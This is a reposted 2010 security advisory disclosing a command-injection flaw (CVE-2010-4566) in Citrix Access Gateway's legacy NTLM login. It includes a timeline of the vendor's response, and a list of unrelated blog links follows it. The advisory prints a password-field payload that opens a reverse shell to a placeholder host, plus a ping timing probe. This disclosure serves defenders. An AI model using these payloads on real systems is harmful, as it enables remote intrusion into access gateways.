Citrix Access Gateway Command Injection Vulnerability

简介:

-----BEGIN PGP SIGNED MESSAGE----- 
Hash: SHA1


VSR Security Advisory 
http://www.vsecurity.com/

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Advisory Name: Citrix Access Gateway Command Injection Vulnerability 
Release Date: 2010-12-21 
Application: Citrix Access Gateway 
Versions: Access Gateway Enterprise Edition (up to 9.2-49.8) 
Access Gateway Standard & Advanced Edition (prior to 5.0) 
Severity: High 
Author: George D. Gal <ggal (at) vsecurity (dot) com> 
Vendor Status: Updated Software Released, NT4 Authentication Removed [2] 
CVE Candidate: CVE-2010-4566 
Reference: http://www.vsecurity.com/resources/advisory/20101221-1/

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


Product Description 
- ------------------- 
- From [1]:

"Citrix(R) Access Gateway(TM) is a secure application access solution that 
provides administrators granular application-level control while 
empowering users with remote access from anywhere. It gives IT 
administrators a single point to manage access control and limit actions 
within sessions based on both user identity and the endpoint device, 
providing better application security, data protection, and compliance 
management."

Vulnerability Overview 
- ----------------------

On August 2nd, VSR identified a vulnerability in Citrix Access Gateway within 
the way user authentication credentials are handled. Under certain 
configuration settings it appears that user credentials are passed as 
arguments to a command line program to authenticate the user. A lack of data 
validation and the mechanism in which the external program is spawned results 
in the potential for command injection and arbitrary command execution on the 
Access Gateway.

Vulnerability Details 
- ---------------------

The Citrix Access Gateway provides support for multiple authentication types. 
When utilizing the external legacy NTLM authentication module known as 
ntlm_authenticator the Access Gateway spawns the Samba 'samedit' command 
line utility to verify a user's identity and password. By embedding shell 
metacharacters in the web authentication form it is possible to execute 
arbitrary commands on the Access Gateway.

The following commands are executed by the ntlm_authenticator during this 
process:

vpnadmin 10130 0.0 0.0 2104 976 ? S 15:02 0:00 sh -c /usr/local/samba/bin/samedit -c 'samuser username -a' -U <<username>>%<<password>> -p 139 -S xxx.xxx.xxx.xxx > /tmp/samedit-samuser-stdout.50474096 2> /dev/null

vpnadmin 10131 0.0 0.1 3852 1528 ? S 15:02 0:00 /usr/local/samba/bin/samedit -c samuser username -a -U <<username>>%XXXXXXXX -p 139 -S xxx.xxx.xxx.xxx

By submitting a password value as shown below, it is possible to establish a 
reverse shell to a netcat listener:

| bash -i >& /dev/tcp/<<HOST>>/<<PORT>> 0>&1 &

Using a simple ping command in the password field an attacker could use timing 
attacks to verify the presence of the vulnerability:

| ping -c 10 <<HOST>>

The ping command above will attempt to send 10 ICMP echo requests to the 
target host, resulting in a noticable delay easily detected by vulnerability 
scanners.

Versions Affected 
- ----------------- 
Testing was performed against a Citrix Access Gateway 2000 version 4.5.7. 
According to the vendor this vulnerability affects all versions of Access 
Gateway Enterprise Edition up to version 9.2-49.8, and all versions of 
the Access Gateway Standard and Advanced Editions prior to Access Gateway 
5.0.

Vendor Response 
- --------------- 
The following timeline details the vendor's response to the reported issue:

2010-08-06 Citrix was provided a draft advisory. 
2010-08-10 Citrix acknowledged receipt of draft advisory. 
2010-08-16 VSR follow-up to determine confirmation of issue. 
2010-08-16 Citrix confirmed issue. 
2010-09-14 VSR follow-up to determine status of issue. 
2010-09-29 VSR follow-up to determine status of issue. 
2010-09-30 Citrix confirmed continued investigation of the issue. 
2010-10-19 VSR follow-up to determine status of issue. 
2010-10-26 Citrix verified issue only exists in NT4 authentication feature. 
2010-12-01 VSR follow-up to determine status of issue. 
2010-12-02 Citrix confirmed December 14th release of security bulletin. 
2010-12-14 Citrix releases security bulletin. 
2010-12-20 CVE assigned 
2010-12-21 VSR releases advisory.


The Citrix advisory may be obtained at: 
http://support.citrix.com/article/CTX127613

Recommendation 
- -------------- 
Citrix has indicated that this vulnerability only affects legacy NT4 
authentication which has been removed from the latest release of the 
device firmware.

Common Vulnerabilities and Exposures (CVE) Information 
- ------------------------------------------------------ 
The Common Vulnerabilities and Exposures (CVE) project has assigned 
the number CVE-2010-4566 to this issue. This is a candidate for 
inclusion in the CVE list (http://cve.mitre.org), which standardizes 
names for security problems.


Acknowledgements 
- ---------------- 
VSR would like to thank Citrix for the coordinated release of this advisory.

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

References:

1. Citrix Access Gateway 
http://citrix.com/accessgateway/overview 
2. Citrix Access Gateway - Vendor Security Bulletin 
http://support.citrix.com/article/CTX127613

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

This advisory is distributed for educational purposes only with the sincere 
hope that it will help promote public safety. This advisory comes with 
absolutely NO WARRANTY; not even the implied warranty of merchantability or 
fitness for a particular purpose. Virtual Security Research, LLC nor the 
author accepts any liability for any direct, indirect, or consequential loss 
or damage arising from use of, or reliance on, this information.

See the VSR disclosure policy for more information on our responsible 
disclosure practices:

http://www.vsecurity.com/company/disclosure

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 
Copyright 2010 Virtual Security Research, LLC. All rights reserved.


-----BEGIN PGP SIGNATURE----- 
Version: GnuPG v1.4.8 (Darwin) 
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAk0Q3L8ACgkQQ1RSUNR+T+idEwCeN2plOLk8rWQoPY4DqAolEY5V 
EbEAoJn38LPt3MEm3xvQaL6wWPbwDsUb 
=b3y+














本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/463393,如需转载请自行联系原作者

相关文章
|
SQL
Symantec Web Gateway 'deptUploads_data.php' SQL Injection Vulnerability
http://www.securityfocus.com/bid/54721/exploit
540 0
|
安全 Shell 网络协议
Citrix Access Gateway Command Injection
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-Advisory Name: ...
839 0
|
2月前
|
负载均衡 Java Nacos
SpringCloud基础2——Nacos配置、Feign、Gateway
nacos配置管理、Feign远程调用、Gateway服务网关
SpringCloud基础2——Nacos配置、Feign、Gateway
|
2月前
|
Java 开发者 Spring
Spring Cloud Gateway 中,过滤器的分类有哪些?
Spring Cloud Gateway 中,过滤器的分类有哪些?
43 3
|
2月前
|
负载均衡 Java 网络架构
实现微服务网关:Zuul与Spring Cloud Gateway的比较分析
实现微服务网关:Zuul与Spring Cloud Gateway的比较分析
91 5
|
1月前
|
负载均衡 Java API
【Spring Cloud生态】Spring Cloud Gateway基本配置
【Spring Cloud生态】Spring Cloud Gateway基本配置
37 0
|
2月前
|
安全 Java 开发者
强大!Spring Cloud Gateway新特性及高级开发技巧
在微服务架构日益盛行的今天,网关作为微服务架构中的关键组件,承担着路由、安全、监控、限流等多重职责。Spring Cloud Gateway作为新一代的微服务网关,凭借其基于Spring Framework 5、Project Reactor和Spring Boot 2.0的强大技术栈,正逐步成为业界的主流选择。本文将深入探讨Spring Cloud Gateway的新特性及高级开发技巧,助力开发者更好地掌握这一强大的网关工具。
207 6
|
4月前
|
负载均衡 Java Spring
Spring cloud gateway 如何在路由时进行负载均衡
Spring cloud gateway 如何在路由时进行负载均衡
475 15
|
4月前
|
Java Spring
spring cloud gateway在使用 zookeeper 注册中心时,配置https 进行服务转发
spring cloud gateway在使用 zookeeper 注册中心时,配置https 进行服务转发
109 3
|
4月前
|
Java 微服务 Spring
SpringCloud gateway自定义请求的 httpClient
SpringCloud gateway自定义请求的 httpClient
181 3